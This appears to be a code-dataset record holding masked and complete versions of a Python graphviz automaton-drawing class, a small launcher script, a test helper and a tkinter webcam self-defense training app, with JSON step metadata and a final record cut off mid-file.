def format_labels(self, labels):
return ','.join(labels)
<|reserved_special_token_0|>
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
def add_edges(self, graph, edges):
for (_from, to), labels in edges.items():
graph.edge(_from, to, self.format_labels(labels))
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
if len(state) == 0:
return 'Ø'
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
return str(state)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
def format_labels(self, labels):
return ','.join(labels)
def get_state(self, rule):
return rule._state
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
def add_edges(self, graph, edges):
for (_from, to), labels in edges.items():
graph.edge(_from, to, self.format_labels(labels))
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
if len(state) == 0:
return 'Ø'
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
return str(state)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
import graphviz
import fa_util
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format="svg", graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state, accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state, accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[(from_state, to_state)] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format="png", view=True)
# Supposed to be extended
def make_label(self, rule):
return "ε" if rule._character == None else rule._character
# Supposed to be extended
def format_labels(self, labels):
return ','.join(labels)
# Supposed to be extended
def get_state(self, rule):
return rule._state
# Supposed to be extended
def get_next_state(self, rule):
return rule._next_state
# Supposed to be extended
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style="invis", shape="point")
graph.edge(dummy_node, self.state_to_str(start_state), style="bold")
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
def add_edges(self, graph, edges):
for (_from, to), labels in edges.items():
graph.edge(_from, to, self.format_labels(labels))
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
### state is iterable ###
if len(state) == 0:
return 'Ø'
# converting list object directly to set object break the order of elements in string
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
### state is not iterable ###
return str(state)
|
flexible
|
{
"blob_id": "c0e94a0d20397ebbbdddf726307b19b6c5c85ae6",
"index": 9082,
"step-1": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n <mask token>\n <mask token>\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n <mask token>\n <mask token>\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n <mask token>\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n try:\n iter(state)\n if len(state) == 0:\n return 'Ø'\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n return str(state)\n",
"step-3": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n\n def format_labels(self, labels):\n return ','.join(labels)\n <mask token>\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n\n def add_edges(self, graph, edges):\n for (_from, to), labels in edges.items():\n graph.edge(_from, to, self.format_labels(labels))\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n try:\n iter(state)\n if len(state) == 0:\n return 'Ø'\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n return str(state)\n",
"step-4": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n\n def format_labels(self, labels):\n return ','.join(labels)\n\n def get_state(self, rule):\n return rule._state\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n\n def add_edges(self, graph, edges):\n for (_from, to), labels in edges.items():\n graph.edge(_from, to, self.format_labels(labels))\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n try:\n iter(state)\n if len(state) == 0:\n return 'Ø'\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n return str(state)\n",
"step-5": "# -*- coding: utf-8 -*-\nimport graphviz\nimport fa_util\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format=\"svg\", graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n\n self.add_graph_node(g, self.get_state(rule), from_state, accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state, accept_states)\n\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[(from_state, to_state)] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n\n g.render(filename=filename, directory=directory, format=\"png\", view=True)\n\n # Supposed to be extended\n def make_label(self, rule):\n return \"ε\" if rule._character == None else rule._character\n\n # Supposed to be extended\n def format_labels(self, labels):\n return ','.join(labels)\n\n # Supposed to be extended\n def get_state(self, rule):\n return rule._state\n\n # Supposed to be extended\n def get_next_state(self, rule):\n return rule._next_state\n\n # Supposed to be extended\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style=\"invis\", shape=\"point\")\n graph.edge(dummy_node, self.state_to_str(start_state), style=\"bold\")\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n\n def add_edges(self, graph, edges):\n for (_from, to), labels in edges.items():\n graph.edge(_from, to, self.format_labels(labels))\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n\n try:\n iter(state)\n ### state is iterable ###\n if len(state) == 0:\n return 'Ø'\n\n # converting list object directly to set object break the order of elements in string\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n ### state is not iterable ###\n return str(state)\n",
"step-ids": [
6,
7,
9,
10,
12
]
}
|
[
6,
7,
9,
10,
12
] |
# -*- coding: utf-8 -*-
# Copyright 2013, Achim Köhler
# All rights reserved, see accompanied file license.txt for details.
# $REV$
import argparse
import traylauncher
if __name__ == "__main__":
args = argparse.Namespace()
args.notray = False
traylauncher.start(args)
|
normal
|
{
"blob_id": "8faaf9eb2e78b7921dd1cac4772e2415671201c7",
"index": 8481,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n args = argparse.Namespace()\n args.notray = False\n traylauncher.start(args)\n",
"step-3": "import argparse\nimport traylauncher\nif __name__ == '__main__':\n args = argparse.Namespace()\n args.notray = False\n traylauncher.start(args)\n",
"step-4": "# -*- coding: utf-8 -*-\n# Copyright 2013, Achim Köhler\n# All rights reserved, see accompanied file license.txt for details.\n\n# $REV$\n\nimport argparse\nimport traylauncher\n\nif __name__ == \"__main__\":\n\targs = argparse.Namespace()\n\targs.notray = False\n\ttraylauncher.start(args)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
message = (
"""
Expected: ""\"%s""\"
Actual: ""\"%s""\"
Expected: %s
Actual: %s"""
% (expected, actual, repr(expected), repr(actual)))
test_case.assertEquals(actual, expected, message)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DATA_DIR = 'tests/data'
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
message = (
"""
Expected: ""\"%s""\"
Actual: ""\"%s""\"
Expected: %s
Actual: %s"""
% (expected, actual, repr(expected), repr(actual)))
test_case.assertEquals(actual, expected, message)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
DATA_DIR = 'tests/data'
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
message = (
"""
Expected: ""\"%s""\"
Actual: ""\"%s""\"
Expected: %s
Actual: %s"""
% (expected, actual, repr(expected), repr(actual)))
test_case.assertEquals(actual, expected, message)
<|reserved_special_token_1|>
# coding: utf-8
"""
Provides test-related code that can be used by all tests.
"""
import os
DATA_DIR = 'tests/data'
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
# Show both friendly and literal versions.
message = """\
Expected: \"""%s\"""
Actual: \"""%s\"""
Expected: %s
Actual: %s""" % (expected, actual, repr(expected), repr(actual))
test_case.assertEquals(actual, expected, message)
|
flexible
|
{
"blob_id": "83d35c413af0cefb71964671b43df1e815aa2115",
"index": 3945,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n message = (\n \"\"\"\n\n Expected: \"\"\\\"%s\"\"\\\"\n Actual: \"\"\\\"%s\"\"\\\"\n\n Expected: %s\n Actual: %s\"\"\"\n % (expected, actual, repr(expected), repr(actual)))\n test_case.assertEquals(actual, expected, message)\n",
"step-3": "<mask token>\nDATA_DIR = 'tests/data'\n\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n message = (\n \"\"\"\n\n Expected: \"\"\\\"%s\"\"\\\"\n Actual: \"\"\\\"%s\"\"\\\"\n\n Expected: %s\n Actual: %s\"\"\"\n % (expected, actual, repr(expected), repr(actual)))\n test_case.assertEquals(actual, expected, message)\n",
"step-4": "<mask token>\nimport os\nDATA_DIR = 'tests/data'\n\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n message = (\n \"\"\"\n\n Expected: \"\"\\\"%s\"\"\\\"\n Actual: \"\"\\\"%s\"\"\\\"\n\n Expected: %s\n Actual: %s\"\"\"\n % (expected, actual, repr(expected), repr(actual)))\n test_case.assertEquals(actual, expected, message)\n",
"step-5": "# coding: utf-8\n\n\"\"\"\nProvides test-related code that can be used by all tests.\n\n\"\"\"\n\nimport os\n\n\nDATA_DIR = 'tests/data'\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n # Show both friendly and literal versions.\n message = \"\"\"\\\n\n\n Expected: \\\"\"\"%s\\\"\"\"\n Actual: \\\"\"\"%s\\\"\"\"\n\n Expected: %s\n Actual: %s\"\"\" % (expected, actual, repr(expected), repr(actual))\n test_case.assertEquals(actual, expected, message)\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):
'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(
days=x)) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal) - 1]
return datetime.date(year, month, day_of_month)
<|reserved_special_token_1|>
import datetime
import calendar
import re
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):
'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(
days=x)) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal) - 1]
return datetime.date(year, month, day_of_month)
<|reserved_special_token_1|>
import datetime
import calendar
import re
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {
0: 'Monday',
1: 'Tuesday',
2: 'Wednesday',
3: 'Thursday',
4: 'Friday',
5: 'Saturday',
6: 'Sunday'
}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [datetime.date(year, month, 1) + datetime.timedelta(days=x) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal)-1]
return datetime.date(year, month, day_of_month)
|
flexible
|
{
"blob_id": "d4b1b6bdf125f2791c219b7db579c234eda0a73c",
"index": 9220,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\n\ndef meetup_day(year, month, day_of_week, ordinal):\n days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):\n 'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}\n possible_days = []\n number_of_days = calendar.monthrange(year, month)[1]\n days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(\n days=x)) for x in range(0, number_of_days)]\n for day in days_of_month:\n if days[day.weekday()] == day_of_week:\n possible_days.append(day.day)\n if ordinal == 'teenth':\n for x in possible_days:\n if 10 < x < 20:\n day_of_month = x\n elif ordinal == 'last':\n day_of_month = possible_days[-1]\n else:\n day_of_month = possible_days[cardinal(ordinal) - 1]\n return datetime.date(year, month, day_of_month)\n",
"step-4": "import datetime\nimport calendar\nimport re\n\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\n\ndef meetup_day(year, month, day_of_week, ordinal):\n days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):\n 'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}\n possible_days = []\n number_of_days = calendar.monthrange(year, month)[1]\n days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(\n days=x)) for x in range(0, number_of_days)]\n for day in days_of_month:\n if days[day.weekday()] == day_of_week:\n possible_days.append(day.day)\n if ordinal == 'teenth':\n for x in possible_days:\n if 10 < x < 20:\n day_of_month = x\n elif ordinal == 'last':\n day_of_month = possible_days[-1]\n else:\n day_of_month = possible_days[cardinal(ordinal) - 1]\n return datetime.date(year, month, day_of_month)\n",
"step-5": "import datetime\nimport calendar\nimport re\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\ndef meetup_day(year, month, day_of_week, ordinal):\n days = {\n 0: 'Monday',\n 1: 'Tuesday',\n 2: 'Wednesday',\n 3: 'Thursday',\n 4: 'Friday',\n 5: 'Saturday',\n 6: 'Sunday'\n }\n\n possible_days = []\n\n number_of_days = calendar.monthrange(year, month)[1]\n\n days_of_month = [datetime.date(year, month, 1) + datetime.timedelta(days=x) for x in range(0, number_of_days)]\n\n for day in days_of_month:\n if days[day.weekday()] == day_of_week:\n possible_days.append(day.day)\n\n if ordinal == 'teenth':\n for x in possible_days:\n if 10 < x < 20:\n day_of_month = x\n elif ordinal == 'last':\n day_of_month = possible_days[-1]\n else:\n day_of_month = possible_days[cardinal(ordinal)-1]\n\n return datetime.date(year, month, day_of_month)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#THIS IS PYTHON3
import tkinter as tk
from tkinter import *
from PIL import ImageTk
from PIL import Image #to handle non-gif image formats
import cv2
import numpy as np
from statistics import mode
import time
import random
import predict as ml
def calcSuccess(predictedCounter, randAssault):
vidLabel.pack_forget()
if predictedCounter == "parry_R":
instructionLabel.config(text="RIGHT PARRY")
if randAssault == 4 or randAssault == 2:
descriptionLabel.config(text="You've successfully parried!")
elif randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 5:
descriptionLabel.config(text="You've been hit!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "parry_L":
instructionLabel.config(text="LEFT PARRY")
if randAssault == 5 or randAssault == 3:
descriptionLabel.config(text="You've successfully parried!")
elif randAssault == 2:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 4:
descriptionLabel.config(text="You've been hit!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "punch_R":
instructionLabel.config(text="RIGHT PUNCH")
if randAssault == 0 or randAssault == 1 or randAssault == 4:
descriptionLabel.config(text="You've successfully counter attacked!")
elif randAssault == 2 or randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 5:
descriptionLabel.config(text="You've been hit!")
if predictedCounter == "punch_L":
instructionLabel.config(text="LEFT PUNCH")
if randAssault == 0 or randAssault == 1 or randAssault == 5:
descriptionLabel.config(text="You've successfully counter attacked!")
elif randAssault == 2 or randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 4:
descriptionLabel.config(text="You've been hit!")
if predictedCounter == "weave_R":
instructionLabel.config(text="RIGHT WEAVE")
if randAssault == 1 or randAssault == 3 or randAssault == 5:
descriptionLabel.config(text="You've successfully evaded!")
elif randAssault == 4:
descriptionLabel.config(text="You've been hit!")
elif randAssault == 2:
descriptionLabel.config(text="You've been cut!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "weave_L":
instructionLabel.config(text="LEFT WEAVE")
if randAssault == 0 or randAssault == 2 or randAssault == 4:
descriptionLabel.config(text="You've successfully evaded!")
elif randAssault == 5:
descriptionLabel.config(text="You've been hit!")
elif randAssault == 3:
descriptionLabel.config(text="You've been cut!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "block":
instructionLabel.config(text="BLOCK")
if randAssault == 5 or randAssault == 4:
descriptionLabel.config(text="You've successfully blocked!")
elif randAssault == 2 or randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 0 or randAssault == 1:
descriptionLabel.config(text="You've been grabbed!")
descriptionLabel.pack()
cap = cv2.VideoCapture(0)
root = tk.Tk() #initialize tkinter by making tk rook widget--consists of window with tile bar and decoration provided by window manager. Root widget must be made first and can only be one.
root.geometry("2000x1100")
ldFrame = Frame(root).pack(side="top") #frame to hold logo and description
canvas = Canvas(ldFrame, width=700, height=200)
canvas.pack(side="top")
#open image with pil image because PhotoImage only takes gif
pilLogo = Image.open("Logo.png")
logo = ImageTk.PhotoImage(pilLogo) #makes PhotoImage from pil image
canvas.create_image(350, 100, image=logo) #adds PhotoImage to Canvas
#make basic description label from text string on the logo description frame
descriptionText = """This program trains the user to respond in self defense to common physical threats."""
descriptionLabel = tk.Label(ldFrame, justify="center", padx=10, font=("Courier", 18), wraplength=1900, text=descriptionText)
descriptionLabel.pack(side="top")
#make center frame that will show instructions initially and then have "assaulter" prompts and live video
centerFrame = Frame(root).pack()
countdownLabel = tk.Label(centerFrame, justify="center", font=("Courier", 20), text="") #invisible for now because not packed
instructionText = """In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session."""
instructionLabel = tk.Label(centerFrame, justify="center", padx=50, pady=50, font=("Courier", 16), wraplength=1800, text=instructionText)
instructionLabel.pack(side="top")
#setup to capture video frames
vidLabel = Label(root)
def show_frame(milliseconds):
if milliseconds > 0:
#global predictionArr
_, frame = cap.read()
#predictionArr.append(predict.get_prediction(frame, "ace-connection-236822", "ICN2459521650166688930"))
frame = cv2.flip(frame, 1) #horizontally flips images so is like reflection
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) #makes normal color
img = Image.fromarray(cv2image)
imgtk = ImageTk.PhotoImage(img)
vidLabel.imgtk = imgtk
vidLabel.config(image=imgtk)
root.update()
root.after(30, show_frame, (milliseconds-30))
_, frame = cap.read()
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img = Image.fromarray(cv2image)
img = img.convert("RGB")
img.save("imgFile.jpeg")
if milliseconds == secondsChosen*3000:
return ml.predict("imgFile.jpeg")
#make bottom frame that hold buttons
buttonFrame = Frame(root)
buttonFrame.pack(side="bottom")
difficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=("Courier", 16))
difficultyList.insert(1, "Easy: 6 seconds")
difficultyList.insert(2, "Medium: 3 seconds")
difficultyList.insert(3, "Hard: 1 seconds")
difficultyList.pack(side="top")
cycling = True
def runPrompt():
startButton.config(text="Next")
startButton.pack(side=LEFT)
resetButton.pack(side=RIGHT)
descriptionLabel.pack_forget()
assaultList = ["Grab from your right", "Grab from your left", "Blade attack from the right", "Blade attack from the left", "Hit from the right", "Hit from the left"]
counterList = ["parry_R", "parry_L", "weave_R", "weave_L", "punch_R", "punch_L", "block"]
difficultyChoice = (difficultyList.get(ACTIVE))
global secondsChosen
secondsChosen = 0
if difficultyChoice[0] == "E":
secondsChosen = 6
elif difficultyChoice[0] == "M":
secondsChosen = 3
else:
secondsChosen = 1
print(secondsChosen)
difficultyList.pack_forget()
randAssault = random.randint(0, 5)
instructionLabel.config(text=assaultList[randAssault], font=("Courier", 25))
vidLabel.pack()
predictedCounter = show_frame(secondsChosen*1000)
if predictedCounter not in counterList:
predictedCounter = counterList[random.randint(0, 6)]
root.after(secondsChosen*1200, calcSuccess, predictedCounter, randAssault)
return 0
def reset():
resetButton.pack_forget()
startButton.config(text="Start")
startButton.pack(side=BOTTOM)
instructionLabel.config(text=instructionText, font=("Courier", 16))
descriptionLabel.config(text=descriptionText, font=("Courier", 18))
descriptionLabel.pack(side=TOP)
difficultyList.pack(side=TOP)
startButton = Button(buttonFrame, bd=6, padx=20, pady=20,font=("Courier", 16), text="Start", fg="green", command=runPrompt)
startButton.pack(side=BOTTOM)
resetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=("Courier", 16), text="Reset", fg="red", command=reset)
root.mainloop()
cap.release()
|
normal
|
{
"blob_id": "8cf6a9243182a4f6b68199a8967e06790396dc10",
"index": 5967,
